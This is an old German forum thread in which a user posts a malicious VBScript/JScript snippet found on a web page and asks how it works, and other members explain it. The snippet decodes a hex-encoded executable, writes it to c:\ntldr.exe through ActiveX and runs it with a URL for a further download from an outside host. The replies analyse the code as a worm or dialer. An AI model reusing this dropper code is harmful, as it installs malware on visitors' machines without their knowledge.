wozu die Schleife ?

E

etrance

Aktives Mitglied
Thread Starter
Dabei seit
08.08.2004
Beiträge
141
Reaktionspunkte
0
kann jemand mir erklären wie die schleife funktioniert ? habe zufällig
bei sürfen auf Desktop bekommt ...wäre unter Windows wahrscheinlich
zum ausführen gekommen :)

<script language=vbscript>
c0 = "4D5A90000300000004000000504500004C01020046534721..sehr lang noch :) .."
h0 = ""
i = 1
Do While i < Len(c0)
c = chr(cint("&h" & mid(c0, i, 2)))
h0 = h0 & c
i = i + 2
Loop
</script>
 
Falsches Forum, du bist hier in PHP nicht in VB ;)

Die Schleife: Während i kleiner als Len(c0) (kenne mich mit VB nicht aus, wird wohl Zeichenkettenlänge sein oder so) ist, wird die Schleife ausgeführt.
 
also ich denke mal das dient primär dazu deinen rechner auszubremsen.
 
Irgendwie wird da die Zeichenkette c0 zerschnipselt und dann in der Variable h0 wieder zusammengesetzt. Fragt mich aber nicht was für einen Sinn das haben soll...
 
ich kenne mit Scripten nicht aus aber ist es so einfach eine SystemObject zuerzeugen und dann auszuführen ?
Die PHP Datei was ich bekomme habe sind noch mehr drin habe nur ausschnitt gepostet.
Wenn ich richtig den code verstanden habe ist dass ein Textfile mit den Endung .exe erzeugen können :( und mit code gefuttet wird

var fs = new ActiveXObject('Scripting.FileSystemObject');
var ts = fs.CreateTextFile("c:\\ntldr.exe", true, false);
ts.Write(h0);
ts.Close();
var wsh = new ActiveXObject('WScript.Shell');
wsh.Run("c:\\ntldr.exe http://www.foxik.com/hb/dllwrap.exe",0);
window.close();

nach Info im Internet ist es ein Wurm. Was macht wohl dllwrap.exe ?? hätte gern jetzt VPC um es zuprobieren
 
Das ist wohlgemerkt kein PHP, sondern VisualBasic Script, eine von MS entwickelte Skriptsprache, die primär dazu dient Sicherheitslücken zu öffnen :D

Damit das Ding funktioniert muss man
a) Windows benutzen
b) mit dem IE surfen
c) die Sicherheitseinstellungen auf einem SEHR niedrigen Level haben

Du hast den Code richtig verstanden. Es wird eine Datei direkt am Laufwerk C mit dem Namen "ntldr.exe" erzeugt.
In die wird dann der Inhalt des oben erzeugten Strings geschrieben (ist das Hex oder was?)
Offenbar ist die Datei dazu bestimmt auf dem Windows Scripting Host (WSH) ausgeführt zu werden.
Beim ausführen (wsh.Run) wird ihr zusätzlich eine Webadresse als Parameter übergeben. Wahrscheinlich holt sich das Programm von dort dann die "dllwrap.exe" auf die Festplatte. Möglicherweise werden so einige der Systembibliotheken (DLLs) ersetzt - reine Vermutung.

So, ich hoffe das war wenigstens ein Bisschen informativ :D
Für Fehler übernehme ich keine Haftung weil es schon ewig her ist, dass ich unter Windows was programmiert hab (und überhaupt unter VB - is ja ekelhaft :p)
 
Zuletzt bearbeitet:
so schleudern die also ihre Würmer ..läst javascript oder sogar JAva auch so leicht ausführtbare Files auf Locale Platte erzeugern? (OS X)

Gruss etrance
 
JavaScript und Java haben zwar einige kleinere Gemeinsamkeiten, aber JavaScript wurde hauptsächlich aus Marketinggründen seinerzeit so getauft. Sun wollte damals die plattformübergreifende, objektorientierte (das war Anfang der 90er irre hip) Programmiersprache Java nach vorn bringen. Eine ursprünglich vielversprechende Sache, stellte sich jedoch schnell heraus, dass Java für die Integration in einem Netscape-Browser den Rahmen ein wenig gesprengt hätte.

Daher musste JavaScript (oder besser ECMA-Script) herhalten, ein wenig Dynamik in die zustandslosen Darstellungen von Text per HTML zu bringen. Zu Deiner Beruhigung: Im Prinzip ist es mit reinem JavaScript nicht ohne Weiteres möglich, lokale Dateien beliebigen Inhaltes auf der Festplatte des Nutzers zu schreiben, da das oberste Objekt, was JavaScript kennt und "sieht", das Browserfenster ist. Eine Festplatte ist da gar nicht in "Sicht".

Dann kam Redmond mit ActiveX-Controls, VBScript und dem ganzen Kram, um genau die oben beschriebene Hürde zu überspringen. Mit ActiveX-Controls kann der Programmierer so gut wie alles, was das Betriebssystem auch kann. Zwar gibt es einige Sicherheitsbeschränkungen, aber diese sind immer erst Monate nach den jeweiligen Meldungen erschienen und gleichen Leukoplast auf offenen Knochenbrüchen.

Jetzt die gute Nachricht: Diese Form der Active-X-Controls, die so tief Zugriff auf die Hardware ermöglichen, gibt es nur in Verbindung mit Windows-Systemen.
 
Java braucht für Zugriffe auf lokale Ressourcen immer ein Sicherheitszertifikat, was vom user akzeptiert werden muß.
 
das ist ein dialer! das skript ist sicher noch ein paar zeilen umfangreicher, denke ich...
auf jeden fall wird auf deriner platte (falls du windows user bist und das erlaubt hast)
eine datei geschrieben (der dialer) und ausgeführt. der lange string dort sind hex codes, welche den exakten kompilierten programmcode wiederspiegeln. so machen das die skript kiddies um an einigen älteren antiviren programmen vorbeizukommen.
 
Du musst dich einloggen oder registrieren, um hier zu antworten.
Zurück
Oben Unten